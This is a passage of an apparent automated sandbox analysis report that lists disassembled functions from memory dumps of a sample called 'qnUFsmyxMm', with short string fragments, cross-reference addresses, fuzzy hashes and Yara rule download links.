Instruction ID: 2ec02cfbfedb7c3c76197b4c55d4fdd7ba3f31f0edaa95cb8cae286b1cc4474a
Opcode Fuzzy Hash: ec4bb49bb568de66e215ebe4feddd760154d11a0b2caa77608cfa43b06ea23ec
Instruction Fuzzy Hash: 5281F77060C3D18BE3388B3984617EBBBD19F93314F18896DD4D98B392DA7D5809C752

Function 007B9AF0 Relevance: 9.4, Strings: 7, Instructions: 608COMMON

Download Yara Rule

Strings

[c[X, xrefs: 007BA0F4
Dk, xrefs: 007BA104
3)K, xrefs: 007BA0EC
gfff, xrefs: 007BA004
"-03, xrefs: 007B9EA8, 007B9EAC
`a, xrefs: 007B9BB6
HJ@[, xrefs: 007BA0FC

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: "-03$Dk$HJ@[$[c[X$`a$gfff$3)K
API String ID: 0-1220033372
Opcode ID: 413b7b421077724935996499f46e1a5d174ae673626e65839c322b57a58b7984
Instruction ID: 45345bbbfce232e15c3691a92139579b2dbe1db88e5b4757c573d1c25ef8d861
Opcode Fuzzy Hash: 413b7b421077724935996499f46e1a5d174ae673626e65839c322b57a58b7984
Instruction Fuzzy Hash: B21213B19083459FC724DF24D8827ABB7F1AF91300F458A2DF5E68B252E778D905CB86

Function 007A8857 Relevance: 8.3, Strings: 6, Instructions: 792COMMON

Download Yara Rule

Strings

E*, xrefs: 007A8F05
-^/P, xrefs: 007A8F57
bcd, xrefs: 007A8F7F
n, xrefs: 007A944F
-R*T, xrefs: 007A8F5F
6V6h, xrefs: 007A8F67

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: bcd$-R*T$-^/P$6V6h$E*$n
API String ID: 0-1706003273
Opcode ID: 753ed4f0248689dd5dfe6cbd477edb4580a631bbf04379a2b3d2cd50b6281eec
Instruction ID: 5df5a7c569fc964a3034fee63c21346f332c51d4ccc7e4c9cfe7f1336709aa50
Opcode Fuzzy Hash: 753ed4f0248689dd5dfe6cbd477edb4580a631bbf04379a2b3d2cd50b6281eec
Instruction Fuzzy Hash: DA423B76A09311CBC324CF29C89176BB7F2EFD9360F098A2DE8C55B251EB389941C752

Function 007A59D0 Relevance: 8.0, Strings: 6, Instructions: 550COMMON

Download Yara Rule

Strings

^], xrefs: 007A5A65
!, xrefs: 007A604E
g*i, xrefs: 007A5CA0
C*E, xrefs: 007A5C7D
>O, xrefs: 007A5A5A
AQ, xrefs: 007A5A44

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: g*i$ !$>O$AQ$^]$C*E
API String ID: 0-4223914267
Opcode ID: 357d966865d5464e4f23a7c1e0c8f01dad8ec3ba28bbff74a5593fc41e9a024e
Instruction ID: b8cafc63540388b773369f5c7e9682e28c88cfafeff31908b8c62e0c8a136260
Opcode Fuzzy Hash: 357d966865d5464e4f23a7c1e0c8f01dad8ec3ba28bbff74a5593fc41e9a024e
Instruction Fuzzy Hash: 3F0237B2609350CBC7348F28D8957ABB3A1FFC2314F19872DE4899B391E7388901C792

Function 007C4B94 Relevance: 7.9, Strings: 6, Instructions: 361COMMON

Download Yara Rule

Strings

UNC, xrefs: 007C4E11
UNC, xrefs: 007C4E0A
UNC, xrefs: 007C4E03
UNC, xrefs: 007C4E23
UNC, xrefs: 007C4E2A
S<, xrefs: 007C501E

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: S<$UNC$UNC$UNC$UNC$UNC
API String ID: 0-1749435030
Opcode ID: 39b126f6b6259f9c32e064cee3751f987941be3460d805d258490f4f4f54ecbd
Instruction ID: acd341c3289bc748964bac40d6cd30f026ef81cd3e962f8c9a421cf8428b5c6d
Opcode Fuzzy Hash: 39b126f6b6259f9c32e064cee3751f987941be3460d805d258490f4f4f54ecbd
Instruction Fuzzy Hash: B4F101216087D08ED326CA3C8858B497FE26B66324F0E82DDD4AA9F3E3C6798945C751

Function 007A790C Relevance: 7.8, Strings: 6, Instructions: 295COMMON

Download Yara Rule

Strings

D, xrefs: 007A7CAB
^_, xrefs: 007A7AF7
6W5Y, xrefs: 007A7A69
CE, xrefs: 007A7A03
GI, xrefs: 007A7A0E
'KM, xrefs: 007A7A19

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 'KM$6W5Y$D$^_$CE$GI
API String ID: 0-60676486
Opcode ID: b6c4a1564cd3641fe3d7654cf52ad8dc6c289961a20af413583e6bac79db39cc
Instruction ID: 7659b3c373e228f2e0a5eb42ed3be17223b90412071d76b1da219f16308be84a
Opcode Fuzzy Hash: b6c4a1564cd3641fe3d7654cf52ad8dc6c289961a20af413583e6bac79db39cc
Instruction Fuzzy Hash: 8DA19CB1508341CFD324CF24C8A1B6BBBF1FF86314F098A5CE4895B2A1E3789945CB96

Function 007A9ADE Relevance: 6.6, Strings: 5, Instructions: 344COMMON

Download Yara Rule

Strings

:SB@, xrefs: 007A9B2B
&9,, xrefs: 007A9D0A
*9,, xrefs: 007A9D47
:SB@, xrefs: 007A9E87, 007A9BE1, 007A9E9E
B, xrefs: 007A9E78

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: &9,$*9,$:SB@$:SB@$B
API String ID: 0-1739858663
Opcode ID: 2c94a60e91332a60c16f752d161838455e759f9907e89584a833d818f60fb937
Instruction ID: b071b4e3aac7f50ee3ea74656039e4b8705c14bceb6c186a119e55502766c218
Opcode Fuzzy Hash: 2c94a60e91332a60c16f752d161838455e759f9907e89584a833d818f60fb937
Instruction Fuzzy Hash: D1C139712093419FD728CF28D491BBB77E2EFC6314F18866DE6CA87292DB389851C712

Function 007A7D1A Relevance: 6.0, Strings: 4, Instructions: 1046COMMON

Download Yara Rule

Strings

$"", xrefs: 007A82F3
FxH, xrefs: 007A8670, 007A869E
Z01#, xrefs: 007A8356
txvW, xrefs: 007A832A

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID: $""$Z01#$txvW$FxH
API String ID: 2994545307-221174876
Opcode ID: 8f825f0e5b68a459a3d94839e4b68fbc465eb759d941a5a7f172114c891fda02
Instruction ID: aa95ca2d95a066030290bfdd54afccf6a5788b51c25d38d9516ece7b3f93534a
Opcode Fuzzy Hash: 8f825f0e5b68a459a3d94839e4b68fbc465eb759d941a5a7f172114c891fda02
Instruction Fuzzy Hash: 22428D72A093519FC728CF28DC91A7BB7E2BBC6310F19472DD5C697252DA399C01CB92

Function 00B1D350 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B1D480,00B4F190), ref: 00B1D355
UnhandledExceptionFilter.KERNEL32(00B1D480,?,00B1D480,00B4F190), ref: 00B1D35F
GetCurrentProcess.KERNEL32(C0000409,?,00B1D480,00B4F190), ref: 00B1D36A
TerminateProcess.KERNEL32(00000000,?,00B1D480,00B4F190), ref: 00B1D371

Memory Dump Source

Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 1b8f84fef32e4bfd092818efb4e58f07e13872b2a8a2ca19d1cc840ad72393f4
Instruction ID: e70d5d7e9233d8f4648100429e4de5b4aee9c76baaa351d3bebdae76ad117ac7
Opcode Fuzzy Hash: 1b8f84fef32e4bfd092818efb4e58f07e13872b2a8a2ca19d1cc840ad72393f4
Instruction Fuzzy Hash: 22D0C979400205ABC7102FE0FE0CA793B6CBB8A212F004420F709C3222CE3296009B72

Function 009186D0 Relevance: 5.7, Strings: 4, Instructions: 716COMMON

Download Yara Rule

Strings

1i, xrefs: 00918C08
l, xrefs: 009189EF
Lhst, xrefs: 0091870E
wj, xrefs: 0091873C

Memory Dump Source

Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 1i$Lhst$l$wj
API String ID: 0-1476473179
Opcode ID: 6d6d3ad956b40677a93ce6116d565a081119ec6ed4416cb6dc13aabd8ff5047f
Instruction ID: ee0079e352bd10dcd6155d149309c67b74645c986147ea4a4322908fceaf122c
Opcode Fuzzy Hash: 6d6d3ad956b40677a93ce6116d565a081119ec6ed4416cb6dc13aabd8ff5047f
Instruction Fuzzy Hash: D3525971E0025A8FCB04DFA9E9916FDBBF4FB18311F1441ABE484EB390DA789945DB60

Function 007B4120 Relevance: 4.2, Strings: 3, Instructions: 468COMMON

Download Yara Rule

Strings

H\, xrefs: 007B419A
Mt, xrefs: 007B41AD
PW, xrefs: 007B4192

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: H\$Mt$PW
API String ID: 0-704480219
Opcode ID: b1216be805493c30d3c15020b07e1298f27eeccc7400e165dbc8bc79ffedf936
Instruction ID: 501a563311a8b8c04e5df4bc3f1dac2eab3f10e14348d824e1650adfca9e6e7d
Opcode Fuzzy Hash: b1216be805493c30d3c15020b07e1298f27eeccc7400e165dbc8bc79ffedf936
Instruction Fuzzy Hash: 86E1447260C3408FD720CF68D8817ABBBE1EB85314F14892DF6959B391D778D909DB82

Function 007B0FC0 Relevance: 4.2, Strings: 3, Instructions: 426COMMON

Download Yara Rule

Strings

cv, xrefs: 007B10DE
cv, xrefs: 007B1379, 007B1320
>UVW, xrefs: 007B1436

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: >UVW$cv$cv
API String ID: 0-1004160449
Opcode ID: 01b4b9bc5355421682e303705620f9cae2caf06abe882c8c0d4d0ceb11af369b
Instruction ID: 9cd81555bfed2276b8c7f3e3f99b30c251f44b908f9af7bca7c50e409cfd88ce
Opcode Fuzzy Hash: 01b4b9bc5355421682e303705620f9cae2caf06abe882c8c0d4d0ceb11af369b
Instruction Fuzzy Hash: 92C1E2702183408BD724DF24C8617ABB7F1FFD2394F959A5CE5958B3A5E7399800CB52

Function 007A7409 Relevance: 4.0, Strings: 3, Instructions: 247COMMON

Download Yara Rule

Strings

mn, xrefs: 007A74AC
7, xrefs: 007A7553
gfff, xrefs: 007A75BD

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 7$gfff$mn
API String ID: 0-217831054
Opcode ID: cb0363a066751d8d25a45c1a19039c360cfac6f8dc70094fd902497e2adcd226
Instruction ID: 8fa50367ef8b7f99b02f3a6adfa072e20bd87b791ec1591579a10c049f491ba0
Opcode Fuzzy Hash: cb0363a066751d8d25a45c1a19039c360cfac6f8dc70094fd902497e2adcd226
Instruction Fuzzy Hash: 6F714D72A182514BD318CF29CC5176B77E6EBC5324F19C72DE495CB395EA389806CBC1

Function 00794BC0 Relevance: 3.3, Strings: 2, Instructions: 807COMMON

Download Yara Rule

Strings

8, xrefs: 0079550B
0, xrefs: 00795513

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 0795940c364409686aa142fd17365f6110d1d53ca7bfd200d1a600bbbeda2692
Instruction ID: 9885d4e23ef72910fcde2c2792a9be40bf75efdf2a78dc567d3aa7cdf4a64ce6
Opcode Fuzzy Hash: 0795940c364409686aa142fd17365f6110d1d53ca7bfd200d1a600bbbeda2692
Instruction Fuzzy Hash: 7C726A716083409FDB25CF18D854BAFBBE2AF88314F48891DF98987392D379D945CB92

Function 007CA260 Relevance: 3.2, Strings: 2, Instructions: 699COMMON

Download Yara Rule

Strings

^_AA, xrefs: 007CA3B2, 007CA4B7
f, xrefs: 007CA4F1

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID: ^_AA$f
API String ID: 2994545307-986475866
Opcode ID: 6ad4edb5555390d65fae086568cc321f204098435da2e4b53c9b39ef2172a4a1
Instruction ID: b11acd1b3eeaa0f72ee947b7b527b5552e96bc1e730198af41cfa6fe47adc719
Opcode Fuzzy Hash: 6ad4edb5555390d65fae086568cc321f204098435da2e4b53c9b39ef2172a4a1
Instruction Fuzzy Hash: 1E22F675608355ABC714CF28C890B2FBBE2ABD8319F19C62DE4D697291D634DC05CB82

Function 007CCC70 Relevance: 3.1, Strings: 2, Instructions: 636COMMON

Download Yara Rule

Strings

=N00, xrefs: 007CD0F3
=N00, xrefs: 007CD100, 007CD13B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =N00$=N00
API String ID: 0-484593190
Opcode ID: 95d967e5097fc279e5bfacd51aea094c31061b857bfe235255af9ea565f6946e
Instruction ID: 88fa07a8f190db43a75a620633bdb020d910cbea88b934e38c9a68a9e3145649
Opcode Fuzzy Hash: 95d967e5097fc279e5bfacd51aea094c31061b857bfe235255af9ea565f6946e
Instruction Fuzzy Hash: 4012ED36619211CFC704CF28E89066AB7F2FBC9314F1AC8BED98A97255D739E841CB41

Function 007CCD60 Relevance: 3.1, Strings: 2, Instructions: 565COMMON

Download Yara Rule

Strings

=N00, xrefs: 007CD0F3
=N00, xrefs: 007CD100, 007CD13B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =N00$=N00
API String ID: 0-484593190
Opcode ID: 414d4c8a70f0d8191e438d5764acc7a52503a826a9e4512ea37fff4403225e5a
Instruction ID: f6224c46090de9ad91354427966d9b8867eb3d659e2eb045d7675c2ddf14aa82
Opcode Fuzzy Hash: 414d4c8a70f0d8191e438d5764acc7a52503a826a9e4512ea37fff4403225e5a
Instruction Fuzzy Hash: A0F1DD36719251CFC308CF28D89062AB7F2FBC9310F1AC9BED98A97655D638E841CB44

Function 007CCEA0 Relevance: 2.9, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

=N00, xrefs: 007CD0F3
=N00, xrefs: 007CD100, 007CD13B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =N00$=N00
API String ID: 0-484593190
Opcode ID: 905598bd09e48a870e0fba728b1a1778f14e65d7e1b57ee7842ecdcda759b311
Instruction ID: 33031076c355fdbe79620ea9ae13a7a443ddee6b0243c4e4d3862647d7ca0a9a
Opcode Fuzzy Hash: 905598bd09e48a870e0fba728b1a1778f14e65d7e1b57ee7842ecdcda759b311
Instruction Fuzzy Hash: 90D1BC36619251CFC308CF28D89062AB3F2FBC9314F1AC97ED58A97655D638E941CB44

Function 007CCFE0 Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

=N00, xrefs: 007CD0F3
=N00, xrefs: 007CD100, 007CD13B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =N00$=N00
API String ID: 0-484593190
Opcode ID: f45921ae7b3d97f7d7066303a82abfb5753c549df7b5468b6fdf4c1645e1d300
Instruction ID: 908df13bd249644ce6dfe935e50c4f008999af0953e680fd27976c5cdd174b91
Opcode Fuzzy Hash: f45921ae7b3d97f7d7066303a82abfb5753c549df7b5468b6fdf4c1645e1d300
Instruction Fuzzy Hash: 45D1E236619250CFC318CF28D89062AB7E2FBC9314F1AC97ED89A97391D739D901CB45

Function 007CCF50 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

=N00, xrefs: 007CD0F3
=N00, xrefs: 007CD100, 007CD13B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =N00$=N00
API String ID: 0-484593190
Opcode ID: acdeb853391c49c6ea5e0359ce89ec1b8ad9d0df998305e0645deb6b8fe8a45b
Instruction ID: 55ddde333392ef5b9c482d21d175b30e222e1c5fd8c5d76df49a1e4131390adc
Opcode Fuzzy Hash: acdeb853391c49c6ea5e0359ce89ec1b8ad9d0df998305e0645deb6b8fe8a45b
Instruction Fuzzy Hash: DCC1DC76619251CFC318CF28D890A2AB7E2FBC9310F1AC97ED88A97351D739E901CB45

Function 00794290 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 0079430B
IEND, xrefs: 00794681

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: e8e54940a6597c415e3775d3bfd946f39e1658318e97c2ab5e5b6720ec3f2297
Instruction ID: fdb1281b5c571bb5303c3c340e574bc3e9c37a85bbed9ef1c8e2cf374be65066
Opcode Fuzzy Hash: e8e54940a6597c415e3775d3bfd946f39e1658318e97c2ab5e5b6720ec3f2297
Instruction Fuzzy Hash: 1CD1B0B1508344DFDB10CF24E845B5EBBE4EB95304F14492DF9999B382E379E909CB92

Function 007B70E0 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

GI, xrefs: 007B6F98
KLM, xrefs: 007B6FA0

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: GI$KLM
API String ID: 0-2564753213
Opcode ID: 1b5c97139300bb224341799d8e3a0983c7d9c5819d7de67d78dee60439cd3ae3
Instruction ID: 07320ae2b4b2f34f5b7a7de6ba348fc6aae751704753f7018afe6065bf7055c6
Opcode Fuzzy Hash: 1b5c97139300bb224341799d8e3a0983c7d9c5819d7de67d78dee60439cd3ae3
